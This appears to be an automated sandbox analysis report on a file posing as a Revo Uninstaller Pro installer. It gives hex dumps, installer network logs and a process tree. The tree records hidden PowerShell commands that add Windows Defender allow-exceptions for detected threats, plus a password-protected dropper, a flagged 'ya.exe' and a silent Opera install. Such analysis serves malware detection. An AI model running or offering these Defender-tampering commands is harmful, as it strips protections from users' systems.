                                                                                                                                            Data Ascii: C}uFGFGFGFGFGFGFNGFOOPeF$PO$UjhtCdP@D3PEduhp4DQMdYUjhtCdP@D3PEduh3DQMdYl$l
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: 89 75 fc e8 58 e3 ff ff 50 8b ce e8 7a 04 00 00 8b 06 8b 40 04 c7 04 06 28 40 44 00 8b 06 8b 48 04 8d 41 98 89 44 31 fc 8b c6 5e c9 c2 10 00 6a 08 b8 2a ad 43 00 e8 66 c6 01 00 6a 00 8d 4d ec e8 0b 4f 00 00 83 65 fc 00 b9 b4 db 44 00 8b 3d a0 db 44 00 89 7d f0 e8 d7 dc ff ff 8b 4d 08 50 e8 ce dd ff ff 8b f0 85 f6 75 4f 85 ff 74 04 8b f7 eb 47 ff 75 08 8d 45 f0 50 e8 b5 03 00 00 59 59 83 f8 ff 74 44 8b 75 f0 8d 4d f0 56 e8 7b 08 00 00 56 c6 45 fc 01 e8 e7 51 00 00 8b 06 59 8b ce ff 50 04 8d 4d f0 89 35 a0 db 44 00 e8 5c 03 00 00 8d 4d f0 e8 66 03 00 00 8d 4d ec e8 e6 4e 00 00 8b c6 e8 b5 c5 01 00 c3 e8 f4 da ff ff cc e8 30 9e fe ff 8b c1 c2 04 00 ff 32 e8 83 05 00 00 c3 56 8b f1 e8 66 05 00 00 8b c6 5e c2 08 00 56 8b f1 e8 58 05 00 00 8b c6 5e c2 04 00 55
                                                                                                                                            Data Ascii: uXPz@(@DHAD1^j*CfjMOeD=D}MPuOtGuEPYYtDuMV{VEQYPM5D\MfMN02Vf^VX^U
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: ff ff 8b c6 5e c9 c2 08 00 55 8b ec 83 ec 10 8b 02 8b 52 04 89 45 f0 8b 45 08 53 56 89 55 f4 8b d9 8b 10 8d 4d f8 8b 40 04 57 89 55 f8 89 45 fc e8 58 d7 ff ff 8d 4d f0 8b f0 8b fa e8 4c d7 ff ff 2b c6 8b cb 89 45 f0 8d 45 f0 1b d7 50 89 55 f4 e8 21 d7 ff ff 5f 5e 8b c3 5b c9 c2 04 00 55 8b ec 51 51 56 8b f1 8b ca e8 1f d7 ff ff 6a 00 68 40 42 0f 00 52 50 e8 91 87 01 00 89 45 f8 8b ce 8d 45 f8 89 55 fc 50 e8 ea d6 ff ff 8b c6 5e c9 c3 55 8b ec 51 51 56 8b f1 8b ca e8 ec d6 ff ff 6a 00 68 40 42 0f 00 52 50 e8 fe 89 01 00 89 45 f8 8b ce 8d 45 f8 89 55 fc 50 e8 b7 d6 ff ff 8b c6 5e c9 c3 81 f9 ff ff ff 7f 0f 87 e3 96 ff ff 8d 04 09 c3 3b 0d 40 b0 44 00 75 01 c3 e9 2e 02 00 00 e9 fe 03 00 00 6a 0c 68 b0 90 44 00 e8 99 08 00 00 c6 45 e7 00 8b 5d 0c 8b c3 8b 7d
                                                                                                                                            Data Ascii: ^UREESVUM@WUEXML+EEPU!_^[UQQVjh@BRPEEUP^UQQVjh@BRPEEUP^;@Du.jhDE]}
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: 45 ff ff ff ff 85 c9 0f 85 74 f6 ff ff 0f b6 4e ea 0f b6 42 ea 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 52 f6 ff ff 0f b6 4e eb 0f b6 42 eb 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 30 f6 ff ff 0f b6 4e ec 0f b6 42 ec 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 0e f6 ff ff 8b 46 ed 3b 42 ed 0f 84 87 00 00 00 0f b6 c8 0f b6 42 ed 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 e1 f5 ff ff 0f b6 4e ee 0f b6 42 ee 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 bf f5 ff ff 0f b6 4e ef 0f b6 42 ef 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 9d f5 ff ff 0f b6 4e f0 0f b6 42 f0 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85
                                                                                                                                            Data Ascii: EtNB+t3ERNB+t3E0NB+t3EF;BB+t3ENB+t3ENB+t3ENB+t3E


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.9  49714        107.167.96.39   443               3532  C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-09 16:40:07 UTC  183  OUT  POST /v5/netinstaller/opera/Stable/windows/x64 HTTP/1.1
  User-Agent: Opera NetInstaller/115.0.5322.77
  Host: autoupdate.geo.opera.com
  Content-Length: 656
  Cache-Control: no-cache
2024-12-09 16:40:07 UTC  656  OUT  Data Ascii: MWZkNGE2YjNhYTYzYjQxNzE2YmZkZTM0YzhlOTRjYTQ1ODNlOGY3ODRmYzMyNmQ3ZDRjMGY4Zjk2MzM2NDEwODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ
2024-12-09 16:40:08 UTC  477  IN  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 16:40:07 GMT
  Content-Type: application/json; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Allow: GET, HEAD, POST
  Cache-Control: no-cache, no-store, must-revalidate, max-age=0
  Pragma: no-cache
  Expires: Thu, 1 Jan 1970 00:00:01 GMT
  X-Content-Type-Options: nosniff
  Referrer-Policy: same-origin
  Cross-Origin-Opener-Policy: same-origin
  Strict-Transport-Security: max-age=31536000; includeSubDomains
2024-12-09 16:40:08 UTC  942  IN  Data Ascii: 3a2{ "installer_arch": "x64", "installer_checksum": "72e779ce7d363a0d1dfda26e9a516079b4d9a0d212c4f94616ff09fe3cf84d00", "installer_filename": "Opera_115.0.5322.77_Autoupdate_x64.exe", "installer_size": 119972712, "installer": "https://download.oper


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.9  49715        107.167.96.38   443               3532  C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-09 16:40:07 UTC  120  OUT  GET /me/ HTTP/1.1
  User-Agent: Opera NetInstaller/115.0.5322.77
  Host: autoupdate.opera.com
  Cache-Control: no-cache
2024-12-09 16:40:07 UTC  471  IN  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 16:40:07 GMT
  Content-Type: application/json; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Allow: HEAD, GET
  Cache-Control: no-cache, no-store, must-revalidate, max-age=0
  Pragma: no-cache
  Expires: Thu, 1 Jan 1970 00:00:01 GMT
  X-Content-Type-Options: nosniff
  Referrer-Policy: same-origin
  Cross-Origin-Opener-Policy: same-origin
  Strict-Transport-Security: max-age=31536000; includeSubDomains
2024-12-09 16:40:07 UTC  57  IN  Data Ascii: 2e{ "country": "US", "timestamp": 1733762407}0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
5           192.168.2.9  49716        107.167.125.189  443               3532  C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-09 16:40:07 UTC  222  OUT  POST /v1/binary HTTP/1.1
  Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
  User-Agent: Opera installer
  Host: desktop-netinstaller-sub.osp.opera.software
  Content-Length: 1474
  Cache-Control: no-cache
2024-12-09 16:40:07 UTC  1474  OUT  Data Ascii: jH827905b5-770e-4890-832f-2b4b0fb32f88ddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610H5e9cd0d4-a463-4317-9584-56d207f4ea74H00c18248-fcc9-4b6b-a8b7-0c50518d9022noneMWZkNGE2Yj
2024-12-09 16:40:08 UTC  162  IN  HTTP/1.1 201 CREATED
  Server: nginx/1.18.0
  Date: Mon, 09 Dec 2024 16:40:08 GMT
  Content-Type: text/html; charset=utf-8
  Content-Length: 36
  Connection: close
2024-12-09 16:40:08 UTC  36  IN  Data Ascii: 827905b5-770e-4890-832f-2b4b0fb32f88


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
6           192.168.2.9  49718        107.167.110.216  443               3532  C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-09 16:40:09 UTC  249  OUT  GET /api/v2/features?country=US&language=en-GB&uuid=ef78c5bf-264b-4601-8713-cff8411ee342&product=&channel=Stable&version=115.0.5322.77 HTTP/1.1
  User-Agent: Opera NetInstaller/115.0.5322.77
  Host: features.opera-api2.com
  Cache-Control: no-cache
2024-12-09 16:40:10 UTC  237  IN  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 16:40:09 GMT
  Content-Type: application/json
  Content-Length: 1768
  Connection: close
  Cache-Control: max-age=3407
  Strict-Transport-Security: max-age=31536000; includeSubDomains
2024-12-09 16:40:10 UTC  1768  IN  Data Ascii: {"features":{"01979299c8cd":{"state":"enabled"},"03b8357e5a08":{"state":"enabled"},"06fbbd0b7bf7":{"state":"enabled"},"0f9cf8758bcc":{"state":"disabled"},"1c4dddb65bac":{"state":"enabled"},"1d24dceb937a":{"state":"enabled"},"2114dc8bd72a":{"state":"enable


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
7           192.168.2.9  49717        107.167.125.189  443               3532  C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-09 16:40:09 UTC  221  OUT  POST /v1/binary HTTP/1.1
  Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
  User-Agent: Opera installer
  Host: desktop-netinstaller-sub.osp.opera.software
  Content-Length: 254
  Cache-Control: no-cache
2024-12-09 16:40:09 UTC  254  OUT  Data Ascii: jHe83c94b8-8da2-402a-b159-dc9a7d113ab5ddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610H5e9cd0d4-a463-4317-9584-56d207f4ea74H00c18248-fcc9-4b6b-a8b7-0c50518d9022
2024-12-09 16:40:10 UTC  162  IN  HTTP/1.1 201 CREATED
  Server: nginx/1.18.0
  Date: Mon, 09 Dec 2024 16:40:10 GMT
  Content-Type: text/html; charset=utf-8
  Content-Length: 36
  Connection: close
2024-12-09 16:40:10 UTC  36  IN  Data Ascii: e83c94b8-8da2-402a-b159-dc9a7d113ab5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49719 | 107.167.96.36 | 443 | 3532 | C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:40:09 UTC | 262 | OUT | GET /download/get/?id=69044&autoupdate=1&ni=1&stream=stable&utm_campaign=r10&utm_medium=apb&utm_source=DWNLST&niuid=5e9cd0d4-a463-4317-9584-56d207f4ea74 HTTP/1.1
User-Agent: Opera NetInstaller/115.0.5322.77
Host: download.opera.com
Cache-Control: no-cache
2024-12-09 16:40:10 UTC | 346 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Mon, 09 Dec 2024 16:40:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Location: https://download3.operacdn.com/ftp/pub/opera/desktop/115.0.5322.77/win/Opera_115.0.5322.77_Autoupdate_x64.exe
Strict-Transport-Security: max-age=31536000; includeSubDomains
2024-12-09 16:40:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49720 | 107.167.125.189 | 443 | 3532 | C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:40:11 UTC | 221 | OUT | POST /v1/binary HTTP/1.1
Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
User-Agent: Opera installer
Host: desktop-netinstaller-sub.osp.opera.software
Content-Length: 248
Cache-Control: no-cache
2024-12-09 16:40:11 UTC | 248 | OUT | Data Raw: 00 00 00 05 6a 02 48 31 61 36 30 30 64 66 34 2d 61 64 33 65 2d 34 36 62 32 2d 62 31 64 39 2d 65 32 35 39 66 36 39 62 39 61 32 30 00 9e c4 d6 c4 f5 64 e0 95 d7 c4 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 35 65 39 63 64 30 64 34 2d 61 34 36 33 2d 34 33 31 37 2d 39 35 38 34 2d 35 36 64 32 30 37 66 34 65 61 37 34 02 48 30 30 63 31 38 32 34 38 2d 66 63 63 39 2d 34 62 36 62 2d 61 38 62 37 2d 30 63 35 30 35 31 38 64 39 30 32 32 02 14 00 00 00 00 06 00 00 00 00 00 00 00 00 08 04 04
Data Ascii: jH1a600df4-ad3e-46b2-b1d9-e259f69b9a20ddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610H5e9cd0d4-a463-4317-9584-56d207f4ea74H00c18248-fcc9-4b6b-a8b7-0c50518d9022
2024-12-09 16:40:12 UTC | 162 | IN | HTTP/1.1 201 CREATED
Server: nginx/1.18.0
Date: Mon, 09 Dec 2024 16:40:12 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36
Connection: close
2024-12-09 16:40:12 UTC | 36 | IN | Data Raw: 31 61 36 30 30 64 66 34 2d 61 64 33 65 2d 34 36 62 32 2d 62 31 64 39 2d 65 32 35 39 66 36 39 62 39 61 32 30
Data Ascii: 1a600df4-ad3e-46b2-b1d9-e259f69b9a20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49722 | 107.167.125.189 | 443 | 3532 | C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:40:13 UTC | 221 | OUT | POST /v1/binary HTTP/1.1
Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
User-Agent: Opera installer
Host: desktop-netinstaller-sub.osp.opera.software
Content-Length: 444
Cache-Control: no-cache
2024-12-09 16:40:13 UTC | 444 | OUT | Data Raw: 00 00 00 05 6a 02 48 62 62 64 31 38 34 38 66 2d 65 64 34 35 2d 34 64 66 62 2d 39 61 61 36 2d 64 33 31 65 34 62 62 34 33 32 36 66 00 a6 f4 d6 c4 f5 64 da b5 d7 c4 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 35 65 39 63 64 30 64 34 2d 61 34 36 33 2d 34 33 31 37 2d 39 35 38 34 2d 35 36 64 32 30 37 66 34 65 61 37 34 02 48 30 30 63 31 38 32 34 38 2d 66 63 63 39 2d 34 62 36 62 2d 61 38 62 37 2d 30 63 35 30 35 31 38 64 39 30 32 32 02 16 02 dc 02 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 6c 6f 61 64 2e 6f 70 65
Data Ascii: jHbbd1848f-ed45-4dfb-9aa6-d31e4bb4326fddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610H5e9cd0d4-a463-4317-9584-56d207f4ea74H00c18248-fcc9-4b6b-a8b7-0c50518d9022https://download.ope
2024-12-09 16:40:14 UTC | 162 | IN | HTTP/1.1 201 CREATED
Server: nginx/1.18.0
Date: Mon, 09 Dec 2024 16:40:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36
Connection: close
2024-12-09 16:40:14 UTC | 36 | IN | Data Raw: 62 62 64 31 38 34 38 66 2d 65 64 34 35 2d 34 64 66 62 2d 39 61 61 36 2d 64 33 31 65 34 62 62 34 33 32 36 66
Data Ascii: bbd1848f-ed45-4dfb-9aa6-d31e4bb4326f


Target ID: 0
Start time: 11:38:52
Start date: 09/12/2024
Path: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe"
Imagebase: 0x400000
File size: 22'221'229 bytes
MD5 hash: 881464F03502D44E29E5FEA8B4C35538
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 11:39:15
Start date: 09/12/2024
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
Imagebase: 0x7ff6fc260000
File size: 71'680 bytes
MD5 hash: EF3179D498793BF4234F708D3BE28633
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 11:39:16
Start date: 09/12/2024
Path: C:\Windows\System32\runonce.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\runonce.exe" -r
Imagebase: 0x7ff651670000
File size: 61'952 bytes
MD5 hash: 9ADEF025B168447C1E8514D919CB5DC0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 11:39:16
Start date: 09/12/2024
Path: C:\Windows\System32\grpconv.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\grpconv.exe" -o
Imagebase: 0x7ff62a720000
File size: 52'736 bytes
MD5 hash: 8531882ACC33CB4BDC11B305A01581CE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 7
Start time: 11:39:18
Start date: 09/12/2024
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
Imagebase: 0x7ff6152f0000
File size: 25'088 bytes
MD5 hash: B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 11:39:18
Start date: 09/12/2024
Path: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
Imagebase: 0x140000000
File size: 25'576'112 bytes
MD5 hash: EE15BFE5A394ADBFB087B053A6A72821
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 9
Start time: 11:39:26
Start date: 09/12/2024
Path: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
Imagebase: 0x400000
File size: 10'103'264 bytes
MD5 hash: 216B49B7EB7BE44D7ED7367F3725285F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.1735791667.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: low
Has exited: true

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:11:39:30
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
                                                                                                                                            Imagebase:0x140000000
                                                                                                                                            File size:25'576'112 bytes
                                                                                                                                            MD5 hash:EE15BFE5A394ADBFB087B053A6A72821
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:13
                                                                                                                                            Start time:11:39:36
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:10'103'264 bytes
                                                                                                                                            MD5 hash:216B49B7EB7BE44D7ED7367F3725285F
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:14
                                                                                                                                            Start time:11:39:37
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123
                                                                                                                                            Imagebase:0xc50000
                                                                                                                                            File size:236'544 bytes
                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:15
                                                                                                                                            Start time:11:39:37
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:16
                                                                                                                                            Start time:11:39:37
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
                                                                                                                                            Imagebase:0x2e0000
                                                                                                                                            File size:419'886 bytes
                                                                                                                                            MD5 hash:A868E9C0A97C2EF80602C0F6634913F8
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 30%, ReversingLabs
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:17
                                                                                                                                            Start time:11:39:38
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
                                                                                                                                            Imagebase:0x6a0000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:18
                                                                                                                                            Start time:11:39:38
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:23
                                                                                                                                            Start time:11:39:43
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
                                                                                                                                            Imagebase:0x6a0000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:24
                                                                                                                                            Start time:11:39:43
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:25
                                                                                                                                            Start time:11:39:48
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
                                                                                                                                            Imagebase:0x6a0000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:26
                                                                                                                                            Start time:11:39:48
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

Target ID:27
Start time:11:39:55
Start date:09/12/2024
Path:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
Imagebase:0x400000
File size:174'444 bytes
MD5 hash:7ACCFDE96C04320BA099144A7BE710CC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 25%, ReversingLabs
Has exited:true

Target ID:28
Start time:11:40:01
Start date:09/12/2024
Path:C:\Users\user\Downloads\OperaSetup.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
Imagebase:0xa80000
File size:2'227'280 bytes
MD5 hash:43D37A6E0FE6E9824DFD80221E6AAD13
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:11:40:02
Start date:09/12/2024
Path:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
Wow64 process (32bit):true
